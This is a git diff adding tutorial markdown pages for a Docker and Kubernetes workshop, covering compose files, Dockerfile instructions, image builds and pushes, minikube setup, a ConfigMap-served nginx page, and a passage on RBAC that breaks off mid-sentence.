+ diff --git a/content/en/docker/a49.Docker-Wordpress 2.md b/content/en/docker/a49.Docker-Wordpress 2.md new file mode 100644 index 0000000..39c9827 --- /dev/null +++ b/content/en/docker/a49.Docker-Wordpress 2.md @@ -0,0 +1,37 @@ +--- +title: "Docker Wordpress Example " +slug: "Docker-Wordpress-Example" +--- + + +## create wordpress docker compose + + +```yml +wordpress: + image: wordpress + links: + - mariadb:mysql + environment: + - WORDPRESS_DB_PASSWORD=password + - WORDPRESS_DB_USER=root + ports: + - "public_ip:80:80" + volumes: + - ./html:/var/www/html +mariadb: + image: mariadb + environment: + - MYSQL_ROOT_PASSWORD=password + - MYSQL_DATABASE=wordpress + volumes: + - ./database:/var/lib/mysql + +``` + +### run docker compose + +```sh +docker compose up +``` + diff --git a/content/en/docker/a5.Push-DockerHub-Webapp 2.md b/content/en/docker/a5.Push-DockerHub-Webapp 2.md new file mode 100644 index 0000000..9de3071 --- /dev/null +++ b/content/en/docker/a5.Push-DockerHub-Webapp 2.md @@ -0,0 +1,128 @@ +--- +title: "Push first Nginx Web app To DockerHub" +description: "nginx" +slug: "Push-first-Nginx-Web-app-To-DockerHub" +--- + + +#### Pull nginx image from dockerhub using + +```sh +dockerworkshop git:(main) βœ— docker pull nginx +Using default tag: latest +latest: Pulling from library/nginx +Digest: sha256:6650513efd1d27c1f8a5351cbd33edf85cc7e0d9d0fcb4ffb23d8fa89b601ba8 +Status: Image is up to date for nginx:latest +docker.io/library/nginx:latest +``` +#### Run Docker with ngnix + +```sh + dockerworkshop git:(main) βœ— docker run --name docker-nginx -p 80:80 -d nginx +63258aebdc2d8ea40a0099efb3e51f8b15db2fe2dc048da3901843b4782d19fb +``` +–name docker-nginx : Name given to the container that is run is docker-nginx-p 80:80 : the port we are exposing and mapping from local machine port number to that of container, in the format local_machine_port:container_port-d : Detached mode – Runs the container in background + +#### check all running docker containers + +```sh +➜ dockerworkshop git:(main) βœ— docker ps +CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +63258aebdc2d nginx "/docker-entrypoint.…" 55 seconds ago Up 55 seconds 0.0.0.0:80->80/tcp docker-nginx +``` + +#### open localhost with specific port + +![](./images/ngnix.png) + +#### Include a static Web Application in the Docker with NGINX + +To include our static Web Application into the Docker Image with NGINX, we shall create a Dockerfile (including commands to build image) and an html file with name index.html (acting as our web application) in a directory named nginx-app. + +create dockerfile with following content : + +```dockerfile + +FROM nginx +COPY . /usr/share/nginx/html + +``` +### create index.html file with following content + +```html + + + + Docker NGINX Tutorial + + +

Join CloudNativeFolks Community

+

Learn to Dockerize with NGINX and your web application.

+ Join Discord + NGINX Tutorial + + + +``` + +#### Build Dockerfile + +```sh +Dockerfile git:(main) βœ— docker build -t nginx-application -f dockerfile.ngnix . +[+] Building 0.1s (7/7) FINISHED + => [internal] load build definition from dockerfile.ngnix 0.0s + => => transferring dockerfile: 87B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/nginx:latest 0.0s + => [internal] load build context 0.0s + => => transferring context: 82B 0.0s + => [1/2] FROM docker.io/library/nginx 0.0s + => [2/2] COPY . /usr/share/nginx/html 0.0s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:54027a144afd33ddd1449b757581c7b554d5411c4b2bac291f5dfbccb85fda41 0.0s + => => naming to docker.io/library/nginx-application 0.0s +➜ Dockerfile git:(main) βœ— +``` + + +#### run updated ngnix webapp + +```sh +docker run --name docker-nginx-app -p 80:80 -d nginx-application + +``` + +#### List docker images + +```sh +Dockerfile git:(main) βœ— docker images +REPOSITORY TAG IMAGE ID CREATED SIZE +nginx-application latest e8742ef897ea 2 minutes ago 135MB +``` + +#### Tag Docker Images + +```sh +docker tag nginx-application sangam14/nginx-application + +``` + +#### Login into Your DockerHub Account + +```sh +docker login +docker push sangam14/nginx-application +Using default tag: latest +The push refers to repository [docker.io/sangam14/nginx-application] +4e9e8987d0ed: Pushed +7a99131e1da4: Mounted from library/nginx +c61a83b92ad9: Mounted from library/nginx +0d96feb871c8: Mounted from library/nginx +902b28ccafe7: Mounted from library/nginx +3063fc92629d: Mounted from library/nginx +a49c6ceb5b3a: Mounted from library/nginx +latest: digest: sha256:09f29db6e4179bd1019a48d2d50944989347fdf145193f4165353d5148a902c8 size: 1777 + +``` \ No newline at end of file diff --git a/content/en/docker/a6.Scratch-Image 2.md b/content/en/docker/a6.Scratch-Image 2.md new file mode 100644 index 0000000..61c8654 --- /dev/null +++ b/content/en/docker/a6.Scratch-Image 2.md @@ -0,0 +1,67 @@ +--- +title: "Build a Base Image from Scratch" +slug: "Build-a-Base-Image-from-Scratch" +--- + + +#### write simple c program + +```c +#include + +int main() +{ +printf("dockerworkshop"); +} +``` + +#### Compile C program + +```sh +gcc -o hello hello.c + +βœ— ./hello +dockerworkshop% + +``` + +#### create dockerfile with following content : + + +```dockerfile +FROM scratch +ADD hello / +CMD ["/hello"] +``` + +### Build Dockerfile without any base image + +```sh +Dockerfile git:(main) βœ— docker build -t sangam14/hello-scratch -f dockerfile.hello . 
+[+] Building 0.1s (5/5) FINISHED + => [internal] load build definition from dockerfile.hello 0.0s + => => transferring dockerfile: 87B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load build context 0.0s + => => transferring context: 33.47kB 0.0s + => [1/1] ADD hello / 0.0s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:769934a6858c0910a3682e966da6c8d9c15b0324307b092eb77258a9a08879ce 0.0s + => => naming to docker.io/sangam14/hello-scratch + + ``` + +#### run docker image + +```sh + docker run sangam14/hello-scratch + dockerworkshop + +``` + + + + + diff --git a/content/en/docker/a7.ADD-instruction 2.md b/content/en/docker/a7.ADD-instruction 2.md new file mode 100644 index 0000000..f28eff3 --- /dev/null +++ b/content/en/docker/a7.ADD-instruction 2.md @@ -0,0 +1,60 @@ +--- +title: "Dockerfile Lab - ADD instruction " +description: " Dockerfile Lab 1 " +slug: "Dockerfile-Lab-ADD-instruction" +--- + +Here's an example of a Dockerfile that uses the ADD instruction to copy a local file into a Docker image: + + +```Dockerfile +FROM ubuntu:latest + +WORKDIR /app + +ADD example.txt /app/ + +CMD ["cat", "/app/example.txt"] + +``` + +#### Build Dockerfile + + +```bash + + Dockerfile git:(main) βœ— docker build -t sangam14/add-dockerfile -f dockerfile.add . +[+] Building 5.2s (9/9) FINISHED + => [internal] load build definition from dockerfile.add 0.0s + => => transferring dockerfile: 131B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/ubuntu:latest 3.1s + => [auth] library/ubuntu:pull token for registry-1.docker.io 0.0s + => [1/3] FROM docker.io/library/ubuntu:latest@sha256:9a0bdde4188b896a372804be2384015e90e3f84906b750c1a53539b585fbbe7f 2.0s + => => resolve docker.io/library/ubuntu:latest@sha256:9a0bdde4188b896a372804be2384015e90e3f84906b750c1a53539b585fbbe7f 0.0s + => => sha256:9a0bdde4188b896a372804be2384015e90e3f84906b750c1a53539b585fbbe7f 1.13kB / 1.13kB 0.0s + => => sha256:61bd0b97000996232eb07b8d0e9375d14197f78aa850c2506417ef995a7199a7 424B / 424B 0.0s + => => sha256:a6be1f66f70f66ef43503292e38ccbfc14f2d5464e7736344783a8fc7bb339a8 2.31kB / 2.31kB 0.0s + => => sha256:8b150fd943bcd54ef788cece17523d19031f745b099a798de65247900d102e18 27.34MB / 27.34MB 1.4s + => => extracting sha256:8b150fd943bcd54ef788cece17523d19031f745b099a798de65247900d102e18 0.4s + => [internal] load build context 0.0s + => => transferring context: 78B 0.0s + => [2/3] WORKDIR /app 0.1s + => [3/3] ADD example.txt /app/ 0.0s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:c3438bfac421fa098b47f37ae00427eadcfb7ed36653a678738c63b0ab33a8d1 0.0s + => => naming to docker.io/sangam14/add-dockerfile + + + ``` + + ### run docker images + +``` +Dockerfile git:(main) βœ— docker run sangam14/add-dockerfile +Sangam Biradar +Docker Community Leader + +``` \ No newline at end of file diff --git a/content/en/docker/a8.Copy-instruction 2.md b/content/en/docker/a8.Copy-instruction 2.md new file mode 100644 index 0000000..cb92794 --- /dev/null +++ b/content/en/docker/a8.Copy-instruction 2.md @@ -0,0 +1,89 @@ +--- +title: "Dockerfile Lab - COPY instruction" +description: " Dockerfile Lab 2 " +slug: "Dockerfile-Lab-COPY-instruction" +--- + +COPY is a dockerfile command that copies files from a local source location to a destination in the Docker container. A Dockerfile is a text file with instructions to set up a Docker container. 
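+For reference, the general form is shown below; `<src>` and `<dest>` are placeholders for a path relative to the build context and a path inside the image:
+
+```Dockerfile
+COPY <src> <dest>
+# e.g. copy myfile1.txt from the build context into /usr/share inside the image
+COPY myfile1.txt /usr/share
+```
+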
+ +create myfile1.txt and myfile2.txt with following content : + +```sh +# myfile1.txt +Hello This is my first file ! +This is file will be copied in /usr/share directory from Docker host to Docker Container. +``` + +```sh +# myfile2.txt +Hello This is my second file ! +This is file will be copied in /tmp directory from Docker host to Docker Container. + +``` +The general syntax of the COPY command is: + +```sh +COPY + +``` +Here, `` and ``are file paths.` ` is the path to the source folder containing files to be copied. This option can be left empty to copy the contents of the current directory. The source of the files has to be a directory on the local computer. + +`` is the destination of the COPY command inside the docker container. This is the path where files are to be copied. + +```Dockerfile +# Instruction for Dockerfile to create a new image on top of the base image (ubuntu) +# Using the base image ubuntu: latest +FROM ubuntu:latest +# Copying myfile1.txt to the containers /usr/share directory +COPY myfile1.txt /usr/share +# Copying myfile2.txt to the containers /tmp directory +COPY myfile2.txt /tmp + +``` +### Build Dockerfile using following Command + +```sh + Dockerfile git:(main) βœ— docker build -t sangam14/copy-dockerfile -f dockerfile.copy . +[+] Building 2.2s (9/9) FINISHED + => [internal] load build definition from dockerfile.copy 0.0s + => => transferring dockerfile: 356B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/ubuntu:latest 2.1s + => [auth] library/ubuntu:pull token for registry-1.docker.io 0.0s + => CACHED [1/3] FROM docker.io/library/ubuntu:latest@sha256:9a0bdde4188b896a372804be2384015e90e3f84906b750c1a53539b585fbbe7f 0.0s + => [internal] load build context 0.0s + => => transferring context: 344B 0.0s + => [2/3] COPY myfile1.txt /usr/share 0.0s + => [3/3] COPY myfile2.txt /tmp 0.0s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:4c660d66bd5f94311a22be23394032e2f2dd45f40fb4831f8e083efe90488763 0.0s + => => naming to docker.io/sangam14/copy-dockerfile + + ``` + + #### check inside container and search for text file + +```sh +➜ Dockerfile git:(main) βœ— docker run -it sangam14/copy-dockerfile bash +root@27a3fbe098c3:/# ls +bin boot dev etc home lib media mnt opt proc root run sbin srv sys tmp usr var +root@27a3fbe098c3:/# cat /usr/share/myfile1.txt +# myfile1.txt +Hello This is my first file ! +This is file will be copied in /usr/share directory from Docker host to Docker Container.root@27a3fbe098c3:/# ls +bin boot dev etc home lib media mnt opt proc root run sbin srv sys tmp usr var +root@27a3fbe098c3:/# cat /tmp/myfile2.txt + +# myfile2.txt +Hello This is my second file ! 
+This is file will be copied in /tmp directory from Docker host to Docker Container.root@27a3fbe098c3:/# + +``` +both file successfully copied inside container + + + + + diff --git a/content/en/docker/a9.CMD-instruction 2.md b/content/en/docker/a9.CMD-instruction 2.md new file mode 100644 index 0000000..f793d7f --- /dev/null +++ b/content/en/docker/a9.CMD-instruction 2.md @@ -0,0 +1,54 @@ +--- +title: "Dockerfile Lab - CMD instruction " +slug: "Dockerfile-Lab-CMD-instruction" +--- + + +The CMD command we saw earlier followed the Shell syntax: + +```bash +CMD executable parameter1 parameter2 +``` + +However, it is better practice to use the JSON array format: + +```json +CMD ["executable", "parameter1", "parameter2"] +``` + +A CMD command can be overridden by providing the executable and its parameters in the docker ​run command. For example: + + +```dockerfile +FROM ubuntu +RUN apt-get update +CMD ["echo" , "Join CloudNativeFolks Community"] +``` +#### build dockerfile + +```sh + docker build -t sangam14/cmd-dockerfile -f dockerfile.cmd . +[+] Building 8.3s (7/7) FINISHED + => [internal] load build definition from dockerfile.cmd 0.0s + => => transferring dockerfile: 125B 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 2B 0.0s + => [internal] load metadata for docker.io/library/ubuntu:latest 2.1s + => [auth] library/ubuntu:pull token for registry-1.docker.io 0.0s + => CACHED [1/2] FROM docker.io/library/ubuntu@sha256:9a0bdde4188b896a372804be2384015e90e3f84906b750c1a53539b585fbbe7f 0.0s + => [2/2] RUN apt-get update 6.0s + => exporting to image 0.1s + => => exporting layers 0.1s + => => writing image sha256:c59a693968aab28243f6852d49be7299e0035e71e39b42f22c07be49cca74fb2 0.0s + => => naming to docker.io/sangam14/cmd-dockerfile + +``` + +#### run docker container + +```sh +Dockerfile git:(main) βœ— docker run sangam14/cmd-dockerfile +Join CloudNativeFolks Community + +``` + diff --git a/content/en/docker/helper 2.md b/content/en/docker/helper 2.md new file mode 100644 index 0000000..54b0767 --- /dev/null +++ b/content/en/docker/helper 2.md @@ -0,0 +1,72 @@ +--- +title: The Ultimate Docker Workshop Tracks +description: Hands on Labs +weight: 1 +--- + +### Table of Content +| Title | Link | +| --------- | ------- | +|1.Pre-requisit for this lab | [Lab](https://kubedaily.com/docs/0.0.1/pre-requist/) | +|2.Docker Hello World Example | [Lab](https://kubedaily.com/docs/0.0.1/hello-world/) | +|3.Docker Image Filtering | | [Lab](https://kubedaily.com/docs/0.0.1/docker-images-filter/) | +|4.Images and Container As Tar file | [Lab](https://kubedaily.com/docs/0.0.1/tarfile/) | +|5.Push first Nginx Web app To DockerHub | [Lab](https://kubedaily.com/docs/0.0.1/push-dockerhub-webapp/) | +|6.Build a Base Image from Scratch | [Lab](https://kubedaily.com/docs/0.0.1/scratch-image/) | +|7.Dockerfile Lab - ADD instruction | [Lab](https://kubedaily.com/docs/0.0.1/add-instruction/) | +|8.Dockerfile Lab - COPY instruction | [Lab](https://kubedaily.com/docs/0.0.1/copy-instruction/) | +|9.Dockerfile Lab - CMD instruction | [Lab](https://kubedaily.com/docs/0.0.1/cmd-instruction/) | +|10.Dockerfile Lab - Entrypoint instruction | [Lab](https://kubedaily.com/docs/0.0.1/entrypoint-instruction/) | +|11.Dockerfile Lab - WORKDIR instruction | [Lab](https://kubedaily.com/docs/0.0.1/workdir-instruction/) | +|12.Dockerfile Lab - RUN instruction | [Lab](https://kubedaily.com/docs/0.0.1/run-instruction/) | +|13.Dockerfile Lab - ARG instruction | [Lab](https://kubedaily.com/docs/0.0.1/arg-instruction/) | 
+|14.Dockerfile Lab - Volume instruction | [Lab](https://kubedaily.com/docs/0.0.1/arg-instruction/) | +|15.Dockerfile Lab - USER instruction | [Lab](https://kubedaily.com/docs/0.0.1/user-instruction/) | +|16.Dockerfile Lab - HEALTHCHECK instruction | [Lab](https://kubedaily.com/docs/0.0.1/healthcheck-instruction/) | +|17.Dockerfile Lab - ENV instruction | [Lab](https://kubedaily.com/docs/0.0.1/env-instruction/) | +|18.Dockerfile Lab - ONBUILD instruction | [Lab](https://kubedaily.com/docs/0.0.1/onbuild-instruction/)| +|19.Running multiple docker containers from CLI | [Lab](https://kubedaily.com/docs/0.0.1/multiple-container/) | +|20.Write First Docker Compose file | [Lab](https://kubedaily.com/docs/0.0.1/write-first-docker_compose/) | +|21.Docker Compose with Volume Mount | [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-volumes/) | +|22.Build Own Dockerfile and Docker Compose with Custom configuration| [Lab](https://kubedaily.com/docs/0.0.1/custom-docker-compose/) | +|23.Simple php apache and database using docker compose| [Lab](https://kubedaily.com/docs/0.0.1/php-database-docker-compose/) | +|24.Host Volume Mount - Data persistentence| [Lab](https://kubedaily.com/docs/0.0.1/host-volume-mount/) | +|25.Named Volume Mount - Data persistentence| [Lab](https://kubedaily.com/docs/0.0.1/name-volume-mount/) | +|26.Docker Compose CLI - Build Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-build/) | +|27.Docker Compose CLI - Config Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-config/) | +|28.Docker Compose CLI - CP Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-cp/) | +|29.Docker Compose CLI - Create Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-create/) | +|30.Docker Compose CLI - Down Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-down/) | +|31.Docker Compose CLI - Events Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-events/) | +|32.Docker Compose CLI - Exec Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-exec/) | +|33.Docker Compose CLI - Images Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-images/) | +|34.Docker Compose CLI - Kill Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-kill/) | +|35.Docker Compose CLI - logs Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-logs/) | +|36.Docker Compose CLI - ls Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-ls/) | +|37.Docker Compose CLI - Pause/unpause Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-pause/) | +|38.Docker Compose CLI - Port Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-port/) | +|39.Docker Compose CLI - ps Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-port/) | +|40.Docker Compose CLI - pull Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-pull/) | +|41.Docker Compose CLI - push Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-push/) | +|42.Docker Compose CLI - restart Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-restart/)| +|43.Docker Compose CLI - rm Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-rm/) | +|44.Docker Compose CLI - run Command| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-run/) | +|45.Setup local network| [Lab](https://kubedaily.com/docs/0.0.1/local-network/) | +|46.Setup Remote network| [Lab](https://kubedaily.com/docs/0.0.1/remote-network/) | +|48.Newtorking in Docker Compose| 
[Lab](https://kubedaily.com/docs/0.0.1/docker-compose-net/) | +|49.Newtorking in Docker Compose with ngnix| [Lab](https://kubedaily.com/docs/0.0.1/docker-compose-ngnix-net/) | +|50.Docker Wordpress Example| [Lab](https://kubedaily.com/docs/0.0.1/docker-wordpress/) | + +Todo List + +51. +52. +53. + + + + + +What next +- [Container Security Track](https://kubedaily.com/docs/0.0.1/container-security/) +- [Kubernetes Workshop Track](https://kubedaily.com/docs/0.0.1/k8s/) diff --git a/content/en/k8s/_overview 2.md b/content/en/k8s/_overview 2.md new file mode 100644 index 0000000..502e644 --- /dev/null +++ b/content/en/k8s/_overview 2.md @@ -0,0 +1,30 @@ +--- +title: "Kubernetes" +url: "k8s/overview" +aliases: +- "/k8s" +--- + +### Table of Content + + +| Title | Link | +| --------- | ------- | +|1.Pre-requisit for this lab|[lab](https://kubedaily.com/k8s/kubernetes-setup/)| +|2.Basics of Pod|[lab](https://kubedaily.com/docs/0.0.1/k8s/basics-of-pods/)| +|3.Create POD with Command and Arguments|[lab](https://kubedaily.com/docs/0.0.1/k8s/pod-command-args/)| +|4.Multi-Container Pods|[lab](https://kubedaily.com/docs/0.0.1/k8s/multipod-container/)| +|5.Deployments & replication|[lab](https://kubedaily.com/docs/0.0.1/k8s/deployment-replicaset/)| +|6.Labels & Selectors|[lab](https://kubedaily.com/docs/0.0.1/k8s/labels-selectors/)| +|7.Kubernetes Service|[lab](https://kubedaily.com/docs/0.0.1/k8s/services/)| +|8.Service Type: NodePort,ClusterIP,LoadBalancer|[lab](https://kubedaily.com/docs/0.0.1/k8s/service-type/)| +|9.Ingress Controller|[lab](https://kubedaily.com/docs/0.0.1/k8s/ingress-controller/)| +|10.ConfigMap|[lab](https://kubedaily.com/docs/0.0.1/k8s/configmap/)| + + + +What next >> + +[kubernetes Security]
+[helm workshop]
+[Service Mesh]
\ No newline at end of file diff --git a/content/en/k8s/c1.Kubernetes-Setup 2.md b/content/en/k8s/c1.Kubernetes-Setup 2.md new file mode 100644 index 0000000..a61eb74 --- /dev/null +++ b/content/en/k8s/c1.Kubernetes-Setup 2.md @@ -0,0 +1,109 @@ +--- +title: " Pre-requisit for this lab " +description: " Multiple Way To creat Kubernetes cluster " +slug: "Pre-requisit for this lab" +--- + + +### Install Minikube + +```sh +https://minikube.sigs.k8s.io/docs/start/ +// i'm using mac so my installation step will be diffeent from you folks + +curl -LO https://storage.googleapis.com/minikube/releases/latest/minikube-darwin-amd64 +sudo install minikube-darwin-amd64 /usr/local/bin/minikube + + +``` + + +### ceate cluster using minikube + + +```sh +➜ k8sworkshop git:(main) βœ— minikube start +πŸ˜„ minikube v1.28.0 on Darwin 13.2.1 (arm64) +✨ Using the docker driver based on existing profile +πŸ‘ Starting control plane node minikube in cluster minikube +🚜 Pulling base image ... +πŸ”„ Restarting existing docker container for "minikube" ... +🐳 Preparing Kubernetes v1.25.3 on Docker 20.10.20 ... +πŸ”Ž Verifying Kubernetes components... + β–ͺ Using image gcr.io/k8s-minikube/storage-provisioner:v5 +🌟 Enabled addons: storage-provisioner, default-storageclass +πŸ„ Done! kubectl is now configured to use "minikube" cluster and "default" namespace by default + +``` +### check it out cluster information + +``` + +➜ k8sworkshop git:(main) βœ— kubectl cluster-info +Kubernetes control plane is running at https://127.0.0.1:51289 +CoreDNS is running at https://127.0.0.1:51289/api/v1/namespaces/kube-system/services/kube-dns:dns/proxy + +To further debug and diagnose cluster problems, use 'kubectl cluster-info dump'. +➜ k8sworkshop git:(main) βœ— + +``` + + +#### some basic commands to understand minikube + +```shell +minikube start +``` + +#### Access the Kubernetes dashboard running within the minikube cluster: + +```shell +minikube dashboard +``` + +#### Once started, you can interact with your cluster using `kubectl`, just like any other Kubernetes cluster. For instance, starting a server: + +```shell +kubectl create deployment hello-minikube --image=kicbase/echo-server:1.0 +``` + +#### Exposing a service as a NodePort + +```shell +kubectl expose deployment hello-minikube --type=NodePort --port=8080 +``` + +#### minikube makes it easy to open this exposed endpoint in your browser: + +```shell +minikube service hello-minikube +``` + +#### Upgrade your cluster: + +```shell +minikube start --kubernetes-version=latest +``` + + +```shell +minikube start -p cluster2 +``` + +#### Stop your local cluster: + +```shell +minikube stop +``` + +#### Delete your local cluster: + +```shell +minikube delete +``` + +#### Delete all local clusters and profiles + +```shell +minikube delete --all +``` diff --git a/content/en/k8s/c10.ConfigMap 2.md b/content/en/k8s/c10.ConfigMap 2.md new file mode 100644 index 0000000..736ca6a --- /dev/null +++ b/content/en/k8s/c10.ConfigMap 2.md @@ -0,0 +1,136 @@ +--- +title: "ConfigMap " +description: " kubernetes Config " +slug: "ConfigMap" +--- + + +#### craete index-html-configmap.yaml with following content + +```yaml +apiVersion: v1 +kind: ConfigMap +metadata: + name: index-html-configmap + namespace: default +data: + index.html: | + +

+    <html>
+    <head>
+    <title>Welcome</title>
+    </head>
+    <body>
+    <h1>Hi! This is a configmap Index file</h1>
+    </body>
+    </html>
+ +``` + +```sh +➜ k8s101 git:(main) βœ— kubectl apply -f index-html-configmap.yaml +configmap/index-html-configmap created + +``` + +#### craete nginx.yaml with following content + + +```yaml +apiVersion: apps/v1 +kind: Deployment +metadata: + name: nginx-deployment + namespace: default +spec: + selector: + matchLabels: + app: nginx + replicas: 2 + template: + metadata: + labels: + app: nginx + spec: + containers: + - name: nginx + image: nginx:latest + ports: + - containerPort: 80 + volumeMounts: + - name: nginx-index-file + mountPath: /usr/share/nginx/html/ + volumes: + - name: nginx-index-file + configMap: + name: index-html-configmap + +``` + + +```sh +➜ k8s101 git:(main) βœ— kubectl apply -f ngnix.yaml +deployment.apps/nginx-deployment created +``` + +#### craete nginx-service.yaml with following content + + +```yaml + +apiVersion: v1 +kind: Service +metadata: + name: nginx-service + namespace: default +spec: + selector: + app: nginx + type: NodePort + ports: + - port: 80 + nodePort: 32000 + targetPort: 80 + + + ``` + + +```sh +➜ k8s101 git:(main) βœ— kubectl apply -f nginx-service.yaml +service/nginx-service created +``` + + +```sh +➜ k8s101 git:(main) βœ— kubectl get svc +NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE +kubernetes ClusterIP 10.96.0.1 443/TCP 14h +nginx-service NodePort 10.105.136.166 80:32000/TCP 49s +web NodePort 10.100.132.142 8080:30646/TCP 123m +web2 NodePort 10.98.210.102 8080:31990/TCP 61m +➜ k8s101 git:(main) βœ— +``` + +```sh +➜ k8s101 git:(main) βœ— minikube service nginx-service +|-----------|---------------|-------------|---------------------------| +| NAMESPACE | NAME | TARGET PORT | URL | +|-----------|---------------|-------------|---------------------------| +| default | nginx-service | 80 | http://192.168.49.2:32000 | +|-----------|---------------|-------------|---------------------------| +πŸƒ Starting tunnel for service nginx-service. +|-----------|---------------|-------------|------------------------| +| NAMESPACE | NAME | TARGET PORT | URL | +|-----------|---------------|-------------|------------------------| +| default | nginx-service | | http://127.0.0.1:53149 | +|-----------|---------------|-------------|------------------------| +πŸŽ‰ Opening service default/nginx-service in default browser... +❗ Because you are using a Docker driver on darwin, the terminal needs to be open to run it. +``` + + +#### you will see output in browser +``` +Welcome + + +Hi! This is a configmap Index file +``` + + diff --git a/content/en/k8s/c11.RBAC 2.md b/content/en/k8s/c11.RBAC 2.md new file mode 100644 index 0000000..831d874 --- /dev/null +++ b/content/en/k8s/c11.RBAC 2.md @@ -0,0 +1,330 @@ +--- +title: "RBAC " +description: " kubernetes Config " +slug: "RBAC" +--- + +#### Role Based Access Control (RBAC) + +Role-Based Access Control (RBAC) in Kubernetes is a method of regulating access to computer or network resources based on the roles of individual users within an enterprise. In the context of Kubernetes, RBAC allows you to control who has access to the Kubernetes API and what they can do with those resources + + - Rules: A rule is a set of operations (verbs) that can be carried out on a group of resources which belong to different API Groups. 
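+For example, a Role whose single rule grants read-only access to Pods in one namespace could look like the following (a minimal sketch; the `pod-reader` name is only illustrative):
+
+```
+apiVersion: rbac.authorization.k8s.io/v1
+kind: Role
+metadata:
+  namespace: default
+  name: pod-reader
+rules:
+- apiGroups: [""]        # "" means the core API group
+  resources: ["pods"]
+  verbs: ["get", "list", "watch"]
+```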
+ +##### kubectl explain role.rules + + ``` + kubectl explain role.rules +GROUP: rbac.authorization.k8s.io +KIND: Role +VERSION: v1 + +FIELD: rules <[]PolicyRule> + +DESCRIPTION: + Rules holds all the PolicyRules for this Role + PolicyRule holds information that describes a policy rule, but does not + contain information about who the rule applies to or which namespace the + rule applies to. + +FIELDS: + apiGroups <[]string> + APIGroups is the name of the APIGroup that contains the resources. If + multiple API groups are specified, any action requested against one of the + enumerated resources in any API group will be allowed. "" represents the + core API group and "*" represents all API groups. + + nonResourceURLs <[]string> + NonResourceURLs is a set of partial urls that a user should have access to. + *s are allowed, but only as the full, final step in the path Since + non-resource URLs are not namespaced, this field is only applicable for + ClusterRoles referenced from a ClusterRoleBinding. Rules can either apply to + API resources (such as "pods" or "secrets") or non-resource URL paths (such + as "/api"), but not both. + + resourceNames <[]string> + ResourceNames is an optional white list of names that the rule applies to. + An empty set means that everything is allowed. + + resources <[]string> + Resources is a list of resources this rule applies to. '*' represents all + resources. + + verbs <[]string> -required- + Verbs is a list of Verbs that apply to ALL the ResourceKinds contained in + this rule. '*' represents all verbs. + + ``` + + - Roles and ClusterRoles: Both consist of rules. The difference between a Role and a ClusterRole is the scope: in a Role, the rules are applicable to a single namespace, whereas a ClusterRole is cluster-wide, so the rules are applicable to more than one namespace. ClusterRoles can define rules for cluster-scoped resources (such as nodes) as well. Both Roles and ClusterRoles are mapped as API Resources inside our cluster. + + +##### kubectl explain role + ``` +kubernetesdaily.github.io git:(main) βœ— kubectl explain role +GROUP: rbac.authorization.k8s.io +KIND: Role +VERSION: v1 + +DESCRIPTION: + Role is a namespaced, logical grouping of PolicyRules that can be referenced + as a unit by a RoleBinding. + +FIELDS: + apiVersion + APIVersion defines the versioned schema of this representation of an object. + Servers should convert recognized schemas to the latest internal value, and + may reject unrecognized values. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources + + kind + Kind is a string value representing the REST resource this object + represents. Servers may infer this from the endpoint the client submits + requests to. Cannot be updated. In CamelCase. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds + + metadata + Standard object's metadata. + + rules <[]PolicyRule> + Rules holds all the PolicyRules for this Role + + ``` + +##### kubectl explain clusterroles + +``` +kubernetesdaily.github.io git:(main) βœ— kubectl explain clusterroles +GROUP: rbac.authorization.k8s.io +KIND: ClusterRole +VERSION: v1 + +DESCRIPTION: + ClusterRole is a cluster level, logical grouping of PolicyRules that can be + referenced as a unit by a RoleBinding or ClusterRoleBinding. + +FIELDS: + aggregationRule + AggregationRule is an optional field that describes how to build the Rules + for this ClusterRole. 
If AggregationRule is set, then the Rules are + controller managed and direct changes to Rules will be stomped by the + controller. + + apiVersion + APIVersion defines the versioned schema of this representation of an object. + Servers should convert recognized schemas to the latest internal value, and + may reject unrecognized values. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources + + kind + Kind is a string value representing the REST resource this object + represents. Servers may infer this from the endpoint the client submits + requests to. Cannot be updated. In CamelCase. More info: + https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds + + metadata + Standard object's metadata. + + rules <[]PolicyRule> + Rules holds all the PolicyRules for this ClusterRole +``` + + + - Subjects: These correspond to the entity that attempts an operation in the cluster. There are three types of subjects: + + - User Accounts: These are global, and meant for humans or processes living outside the cluster. There is no associated resource API Object in the Kubernetes cluster. + + - Service Accounts: This kind of account is namespaced and meant for intra-cluster 